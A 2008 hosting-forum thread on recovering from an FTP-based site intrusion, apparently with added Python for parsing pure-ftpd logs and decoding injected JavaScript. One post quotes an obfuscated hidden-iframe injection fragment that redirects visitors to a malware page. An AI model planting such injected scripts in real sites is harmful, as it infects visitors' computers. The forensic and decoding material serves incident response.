server intrusion: quick fixes & what to do




Posted by aradulescu246, 11-07-2008, 08:08 AM
server intrusion: quick fixes

Posted by zzhosting, 11-07-2008, 09:05 AM
Hi. If they got in via FTP then let the user know and change the password. It sounds like the password was guessed or obtained some other way. If you have a billing system that stores user details, check to see whether that IP appears anywhere in the billing system logs. You could report the hacker by finding the owner of the IP and sending an email to the abuse contact address for that IP block (you can find this by doing a whois on the IP in question). In my experience this doesn't lead to anything. Hope that helps.

Posted by aradulescu246, 11-07-2008, 10:01 AM
I already changed the passwords for all accounts. What I found strange is that they added encoded JavaScript to the end of each PHP/HTML page. Can I infer any purpose from this behavior pattern? I think that if somebody wanted to steal the database, which is the most valuable thing on this site, they would simply have added some script to export it, or simply accessed cPanel directly.

Posted by zzhosting, 11-07-2008, 10:14 AM
Sounds like a random attack / PHP exploit in that case. Is the software up to date? Are the permissions OK on the PHP scripts, i.e. not 777? It does seem strange that they only did that, but then what goes through a hacker's mind is beyond me too...

Posted by aradulescu246, 11-07-2008, 10:44 AM
Yep, indeed, it's an exploit that was redirecting to a malware site. The scripts are not 777, but register_globals is on. Is it possible to get an account password using only register_globals-based exploits?

Posted by JulesR, 11-07-2008, 12:50 PM
Why oh why do people insist on attempting to debug server intrusions themselves when they don't know how? Hire a professional before you waste further time on this forum trying to "learn", when your immediate priority should be resolving the situation and closing the hole. I mean no offence here, just that this isn't something you should take lightly and expect to be able to hone your server administration skills on. Your customers' data is at risk here; do the right thing.

Posted by sabarishks, 11-07-2008, 05:51 PM
Quote: Originally Posted by aradulescu246
I just got an intrusion on one of my websites, which is hosted on a dedicated server. I do not know the nature of the attack, only that a portion of encoded JavaScript was added to all PHP/HTML pages. What steps should I take to find where the attack came from? So far I checked the FTP logs and found what is most likely the IP of the attacker. I also suspect it did not get root access, since it used FTP to change the pages. Any advice is appreciated. Also, is there some way I can decode the JavaScript it used so I can see what it was doing?

This is an iframe attack. The better solution would be to change the FTP port to a non-standard one. Also, try to make the passwords stronger.

Posted by sabarishks, 11-07-2008, 05:54 PM
Use this command to track the culprit (it pulls the "(user@ip)" field out of the pure-ftpd lines in /var/log/messages that mention index files and counts hits per user/IP):

grep index /var/log/messages | grep pure-ftpd | awk '{print $6}' | tr '()' ' ' | tr '@' ' ' | sort -n | uniq -c | sort -n
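The one-liner above answers "which IP touched index files", but it says nothing about which accounts an IP wrote into or whether a login was brute-forced first. Below is an added example of my own, not code from the thread, that parses pure-ftpd syslog lines of the same "(user@ip) [LEVEL] message" shape, counts failed authentications per source IP, and flags IPs that uploaded PHP/HTML pages into more than one account or uploaded pages after failed logins (both patterns fit what the original poster described). The log lines are constructed for the example; the message texts ("Authentication failed for user [...]", "... uploaded (N bytes, ...)") follow pure-ftpd's syslog output as I know it and should be checked against your own /var/log/messages before you rely on the regexes.

```python
import re
from collections import Counter, defaultdict

# Constructed sample lines (not from the thread) in the syslog shape the grep/awk
# pipeline above assumes: "... pure-ftpd: (user@ip) [LEVEL] message".
SAMPLE_LOG = """\
Nov  7 06:12:01 web1 pure-ftpd: (?@192.0.2.10) [INFO] New connection from 192.0.2.10
Nov  7 06:12:02 web1 pure-ftpd: (?@192.0.2.10) [WARNING] Authentication failed for user [site1]
Nov  7 06:12:03 web1 pure-ftpd: (?@192.0.2.10) [WARNING] Authentication failed for user [site1]
Nov  7 06:12:05 web1 pure-ftpd: (?@192.0.2.10) [INFO] site1 is now logged in
Nov  7 06:12:09 web1 pure-ftpd: (site1@192.0.2.10) [NOTICE] /home/site1/public_html//index.php uploaded  (4120 bytes, 95.12KB/sec)
Nov  7 06:12:11 web1 pure-ftpd: (site1@192.0.2.10) [NOTICE] /home/site1/public_html//about/index.html uploaded  (2210 bytes, 80.00KB/sec)
Nov  7 06:13:40 web1 pure-ftpd: (site2@192.0.2.10) [NOTICE] /home/site2/public_html//index.php uploaded  (3900 bytes, 70.00KB/sec)
Nov  7 09:30:12 web1 pure-ftpd: (?@198.51.100.7) [INFO] New connection from 198.51.100.7
Nov  7 09:30:15 web1 pure-ftpd: (?@198.51.100.7) [INFO] site3 is now logged in
Nov  7 09:31:02 web1 pure-ftpd: (site3@198.51.100.7) [NOTICE] /home/site3/public_html//images/logo.png uploaded  (15300 bytes, 200.00KB/sec)
Nov  7 09:31:30 web1 pure-ftpd: (site3@198.51.100.7) [NOTICE] /home/site3/public_html//index.php downloaded  (3900 bytes, 70.00KB/sec)
"""

# syslog prefix, then the "(user@ip)" field the awk '{print $6}' above extracts
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+pure-ftpd:\s+"
    r"\((?P<user>[^@)]*)@(?P<ip>[^)]+)\)\s+\[(?P<level>\w+)\]\s+(?P<msg>.*)$"
)
UPLOAD_RE = re.compile(r"^(?P<path>\S+) uploaded\s+\((?P<size>\d+) bytes")
FAILED_RE = re.compile(r"^Authentication failed for user \[(?P<user>[^\]]*)\]")
# files an attacker would overwrite to inject a script/iframe into every page
PAGE_RE = re.compile(r"\.(?:php\d?|phtml|html?|js)$", re.IGNORECASE)


def parse_events(log_text):
    """Yield one dict per pure-ftpd line; other syslog lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def page_uploads_by_ip(log_text):
    """Source IP -> {'accounts': set of FTP users, 'files': list of uploaded page paths}."""
    result = defaultdict(lambda: {"accounts": set(), "files": []})
    for ev in parse_events(log_text):
        up = UPLOAD_RE.match(ev["msg"])
        if up and PAGE_RE.search(up["path"]):
            result[ev["ip"]]["accounts"].add(ev["user"])
            result[ev["ip"]]["files"].append(up["path"])
    return dict(result)


def failed_logins_by_ip(log_text):
    """Source IP -> number of failed FTP authentications (0 for IPs never seen failing)."""
    return Counter(ev["ip"] for ev in parse_events(log_text) if FAILED_RE.match(ev["msg"]))


def suspicious_ips(log_text, min_accounts=2):
    """IPs that pushed web pages into several accounts, or failed logins and then uploaded pages."""
    uploads = page_uploads_by_ip(log_text)
    failures = failed_logins_by_ip(log_text)
    flagged = set()
    for ip, info in uploads.items():
        if len(info["accounts"]) >= min_accounts or failures[ip] > 0:
            flagged.add(ip)
    return sorted(flagged)


if __name__ == "__main__":
    for ip in suspicious_ips(SAMPLE_LOG):
        info = page_uploads_by_ip(SAMPLE_LOG)[ip]
        print(f"{ip}: {failed_logins_by_ip(SAMPLE_LOG)[ip]} failed logins, "
              f"pages uploaded into accounts {sorted(info['accounts'])}:")
        for path in info["files"]:
            print("   ", path)
```

Run it against your real file by replacing SAMPLE_LOG with open("/var/log/messages").read(); the list of uploaded paths per flagged IP is also your list of files to restore from a clean backup, which the thread's one-liner does not give you.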

Posted by aradulescu246, 11-14-2008, 10:32 AM
I took this solution: I restricted FTP access to specific IPs only and also changed the passwords on all accounts. I am also thinking of implementing SFTP. I did a search in the logs for the IP and found only 2 websites were affected. Thanks to all the people who posted helpful comments.

Posted by hummingbirdhosting, 11-14-2008, 10:48 AM
Hi. SFTP will open your server up even more, as you will also be allowing people to SSH to your server. IMO that would be worse than what you currently have, unless of course you already allow SSH access. Thanks

Posted by bear, 11-14-2008, 10:58 AM
Quote: Originally Posted by hummingbirdhosting
SFTP will open your server up even more, as you will also be allowing people to SSH to your server. IMO that would be worse than what you currently have, unless of course you already allow SSH access.

"SFTP is not FTP run over SSH": http://en.wikipedia.org/wiki/SSH_file_transfer_protocol

Posted by WeWatch, 11-16-2008, 09:22 PM
If you still want the JavaScript decoded, please PM me or post it here and I'll decode it for you. If the logs show that they got in via FTP, then they either used a password cracker/brute forcer, or they infected someone's PC that has FTP access to these sites, installed a keylogger and just waited until they logged in. Hackers/crackers/cybercriminals do this to make money. They probably put the code at the bottom of your page in an attempt to hide it from you. They make money by redirecting traffic to their pharmacy sites, or by infecting PCs, taking control of them and then installing pay-per-install software for which they get paid for each install. When they control a computer, they can do whatever they want with it. They don't hack just for fun or just to annoy you. They hack for a profit. If you have a highly trafficked site, they could use your popularity to increase the search engine rankings of their sites with some strong links. I'd be really anxious to decode that JavaScript. That might provide more clues as to their real motivation. Let me know...
__________________
Thomas J. Raef, WeWatchYourWebsite

Posted by mali, 11-17-2008, 04:15 AM
I am using cPanel on CentOS 4. Today I got an iframe injection on all cPanel 00usbggpl/do0pvu/qiq#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = ""; for(var i=0;i
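Two posts in this thread ask for the injected JavaScript to be decoded (aradulescu246's original question, repeated in WeWatch's offer), and the post above shows what such a payload looks like: an obfuscated string followed by the start of a `var result = ""; for(var i=0;i` loop. That loop shape is the usual `result += String.fromCharCode(s.charCodeAt(i) - 1)` decoder, so the encoding is a per-character shift of +1; that is my assumption from the visible fragment, not something the post states. The Python below is an added example, not code from the thread, that undoes the shift, ranks candidate shifts by how HTML-like the output is (so you do not have to read the decoder loop first), and then pulls out the URL and the "invisible iframe" indicators from the result. The obfuscated string is copied exactly as quoted above, so its beginning is missing and the decoded markup starts mid-attribute.

```python
import re
import string

# The obfuscated fragment exactly as quoted in the post above (its start was cut off
# in the thread). Assumption: it was fed to a charCodeAt(i) - 1 decoder loop.
OBFUSCATED = "00usbggpl/do0pvu/qiq#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"


def shift_decode(s, shift):
    """Inverse of String.fromCharCode(s.charCodeAt(i) + shift) applied to every character."""
    return "".join(chr(ord(c) - shift) for c in s)


# Markers a decoded web injection is likely to contain; used only to rank candidate shifts.
HTML_MARKERS = ("<iframe", "</iframe>", "src=", "http", ".php", "style=",
                "hidden", "width=", "height=", "<script", "document.write")


def html_score(text):
    """Number of HTML markers present plus the fraction of printable characters."""
    printable = sum(c in string.printable for c in text) / max(len(text), 1)
    return sum(marker in text for marker in HTML_MARKERS) + printable


def guess_shift(s, candidates=range(-10, 11)):
    """Try each candidate shift; return (shift, decoded) for the most HTML-like result."""
    shift, _ = max(((k, html_score(shift_decode(s, k))) for k in candidates),
                   key=lambda pair: pair[1])
    return shift, shift_decode(s, shift)


# absolute or protocol-relative URLs: where the hidden iframe sends the visitor
URL_RE = re.compile(r"(?:https?:)?//[\w.-]+(?::\d+)?/[^\s\"'<>]*")


def extract_urls(html):
    """URLs found in the decoded markup, in order of appearance."""
    return URL_RE.findall(html)


def hidden_iframe_indicators(html):
    """Flags for the classic invisible-iframe injection discussed in this thread."""
    low = html.lower()
    return {
        "iframe": "iframe" in low,
        "hidden_style": "visibility" in low and "hidden" in low,
        "tiny_size": bool(re.search(r"width=[\"']?[01]\b", low))
                     and bool(re.search(r"height=[\"']?[01]\b", low)),
    }


if __name__ == "__main__":
    shift, decoded = guess_shift(OBFUSCATED)
    print(f"shift {shift:+d}: {decoded}")
    print("urls:", extract_urls(decoded))
    print("indicators:", hidden_iframe_indicators(decoded))
```

The scoring is deliberately crude: a single-character shift is the cheapest obfuscation in the wild, and a handful of markup tokens is enough to pick the right shift out of twenty candidates. Payloads that use eval(unescape(...)) or a multi-layer packer need a real JavaScript interpreter with eval hooked to print its argument, not a shift search. Once you have the destination host, that is what you block at the proxy, search for across every other site on the server, and report to the abuse contact, since the same host is usually shared by every page the same campaign defaced.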